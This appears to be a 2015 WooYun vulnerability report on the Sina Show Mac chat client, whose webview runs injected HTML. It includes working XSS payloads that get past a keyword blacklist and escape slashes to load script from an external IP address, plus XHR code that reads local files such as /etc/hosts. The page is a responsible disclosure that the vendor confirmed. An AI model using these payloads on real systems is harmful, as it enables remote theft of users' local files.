当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148359

漏洞标题:新浪Show视频聊天客户端(Mac版)设计缺陷可远程读取用户本地文件

相关厂商:新浪

漏洞作者: 数据流

提交时间:2015-10-21 15:47

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-24: 厂商已经确认,细节仅向厂商公开
2015-10-27: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

Mac的客户端还是短板,很多厂商不重视,都以windows为重。。。

详细说明:

新浪show Mac版(最新)
进了一个没人的聊天室

QQ20151021-1@2x.png


看到这样的界面与文字就知道是用webview
直接测试<iframe> 居然直接在聊天界面打印出html了。

QQ20151021-2@2x.png


本来想看看location.href的 没想到却提示非法字符

QQ20151018-1@2x.png


“location.href” 这就是黑名单关键字

<img src=x onerror="var x=location;document.write(x.href)">


只要拆分location和href就能绕过了

QQ20151018-3@2x.png

是file://域
navigator.userAgent 是safari

QQ20151021-3@2x.png


基于safari的特性,在file://下时可以跨域
但测试时候发现"/"和域名是非法字符,但可以用ascii字符来绕过,而且也没对ip地址进行检测

<img src=x onerror=document.body.appendChild(document.createElement('script')).src="http:\x2f\x2f23.244.125.233\x2f1.js">


直接加载外部js更方便

xhr = new XMLHttpRequest();
xhr.onreadystatechange = function (){
if (xhr.readyState == 4) {
prompt(xhr.responseText);
} };
xhr.open("GET",
"http://wooyun.org");
xhr.send();


QQ20151021-4@2x.png


但是并不能读到safari已登陆的状态,但可以读取file://上的数据

漏洞证明:

/etc/hosts

QQ20151020-4@2x.png


用户本机上的部分文件可被远程窃取

修复方案:

版权声明:转载请注明来源 数据流@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-10-24 10:21

厂商回复:

感谢关注新浪安全,将通知第三方进行问题修复。

最新状态:

暂无


漏洞评价:

评价

  1. 2015-10-21 15:55 | _Thorns ( 普通白帽子 | Rank:1656 漏洞数:246 | WooYun is the Bigest gay place. 网络工...)

    666

  2. 2015-10-21 16:04 | f4ckbaidu ( 普通白帽子 | Rank:223 漏洞数:28 | 开发真是日了狗了)

    777

  3. 2015-10-21 16:23 | 泪雨无魂 ( 普通白帽子 | Rank:207 漏洞数:54 )

    888

  4. 2015-10-21 16:26 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了,跪着也要...)

    999

  5. 2015-10-21 16:28 | 梧桐雨 认证白帽子 ( 核心白帽子 | Rank:1628 漏洞数:188 | 新年快乐!)

    屌,都用起mac了

  6. 2015-10-21 16:29 | 数据流 认证白帽子 ( 普通白帽子 | Rank:738 漏洞数:93 | 没关系啊,我们还有音乐)

    @梧桐雨 一直都在用mac。。 哈哈

  7. 2015-10-21 16:55 | 撸大叔 ( 实习白帽子 | Rank:62 漏洞数:11 | 钓鱼培养耐心 养鱼需要精心!)

    666

  8. 2015-10-21 22:23 | PyNerd ( 普通白帽子 | Rank:175 漏洞数:33 | Just for shell.)

    @_Thorns 师傅

  9. 2015-10-22 17:04 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    Mark一下

  10. 2015-10-24 17:00 | 坏小子 ( 路人 | Rank:0 漏洞数:1 | 跪求工作)

    壕啊,都开始mac了